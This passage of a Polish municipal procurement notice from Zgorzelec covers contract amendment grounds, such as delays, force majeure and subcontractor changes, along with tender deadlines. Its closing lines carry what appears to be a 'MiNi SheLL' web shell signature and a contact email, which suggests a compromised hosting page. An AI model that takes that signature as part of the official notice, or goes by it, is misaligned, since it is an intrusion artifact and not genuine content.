    przypadku wystąpienia opóźnień wynikających z:  
    a) opóźnień zawinionych przez Zamawiającego, mających wpływ na termin realizacji 
        przedmiotu umowy, w szczególności dot. przekazania terenu budowy, dokonania 
        odbioru końcowego robót, przekazania  dokumentacji projektowej, 
    b) opóźnień z powodu wystąpienia warunków   atmosferycznych uniemożliwiających 
        wykonanie robót budowlanych zgodnie z technologią  - a fakt wystąpienia  tych
        warunków wpisany zostanie przez Kierownika Robót do Dziennika Robót 
        i zostanie  potwierdzony przez Inspektora Nadzoru działającego z ramienia 
        Zamawiającego, 
    c) z przyczyn losowych, w przypadku wystąpienia działania siły wyższej, mającej 
        bezpośredni wpływ na terminowość wykonania robót budowlanych. Pod pojęciem 
        siły wyższej strony rozumieć będą  zdarzenie zewnętrzne o charakterze: 
        niezależnym od stron, którego strony nie mogły przewidzieć przed zawarciem 
        umowy i którego nie można uniknąć ani któremu strony nie mogły zapobiec przy 
        zachowaniu należytej staranności.  
        Za siłę wyższą warunkującą zmianę umowy uważać się będzie w szczególności:
        powódź, pożar i inne klęski żywiołowe, zamieszki, strajki (nie dotyczą 
        pracowników Wykonawcy), ataki terrorystyczne, działania wojenne, nagłe przerwy 
        w dostawie energii elektrycznej, promieniowanie, lub skażenia, 
    d) zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym 
        wpływ na realizację przedmiotu zamówienia,                  
    e) wstrzymania robót budowlanych  przez uprawnione do tego organy w 
        okolicznościach, za które Wykonawca nie ponosi odpowiedzialności,         
    f)  w przypadku wystąpienia istotnych wad dokumentacji projektowej, skutkujących 
        koniecznością dokonania poprawek lub uzupełnień, jeżeli uniemożliwia to lub 
        istotnie wstrzymuje realizację określonego rodzaju robót, 
2) Zmiana harmonogramu rzeczowego realizacji robót, o którym mowa w § 3 ust. 2-3 
    projektu umowy,  w przypadku zmiany terminu wykonania  przedmiotu umowy.
3) Zmiana osoby wskazanej w umowie z imienia i nazwiska odpowiedzialnej za 
    realizację umowy, o której mowa w § 11 projektu umowy, będzie możliwa w 
    każdym czasie  w trakcie związania umową pod warunkiem,  że osoba  ta posiadać 
    będzie co najmniej takie same uprawnienia jak osoba wskazana przez Wykonawcę 
    w ofercie.   
4) Zmiana Podwykonawcy możliwa będzie jedynie wtedy, gdy zakres realizowanych 
    przez Podwykonawcę robót, nie ulegnie zmianie w stosunku do zakresu robót 
    wskazanych w ofercie Wykonawcy, a które zaplanował on do realizacji przez 
    Podwykonawcę. Zmiana taka możliwa będzie jedynie na uzasadniony  wniosek 
    Wykonawcy, do którego winien załączyć projekt umowy z Podwykonawcą, przy 
    czym wymagana jest w tym przypadku pisemna zgoda Zamawiającego na zawarcie 
    przez Wykonawcę umowy z innym Podwykonawcą. 

2. W przedstawionych w punkcie 1 podpunkt 1 przypadkach wystąpienia opóźnień, 
    strony ustalają nowe terminy realizacji umowy, z tym, że okres  przesunięcia 
    terminu realizacji przedmiotu umowy równy będzie co najmniej okresowi przerwy lub 
    postoju. 
3. Warunkiem wprowadzenia zmian do zawartej umowy będzie potwierdzenie powstałych 
    okoliczności w formie opisowej i właściwie umotywowanej, potwierdzonej przez każdą 
    ze stron umowy. 
4. Strona ubiegająca się o zmianę umowy w w/w przypadkach, powinna zwrócić się do  
    Wykonawcy/Zamawiającego w formie pisemnej z wnioskiem,  o wprowadzenie 
    zmian  w umowie aneksem, w terminie  7 dni od daty zdarzenia uzasadnionego zmianą.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.bip.um-zgorzelec.dolnyslask.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Zgorzelec
Wydział Zamówień Publicznych
59-900 Zgorzelec ul. Domańskiego 6 pokój 6.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.05.2011 godzina 11:00, miejsce: Urząd Miasta Zgorzelec
59-900 Zgorzelec 
ul.  Domańskiego 7
Punkt Obsługi Interesanta.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com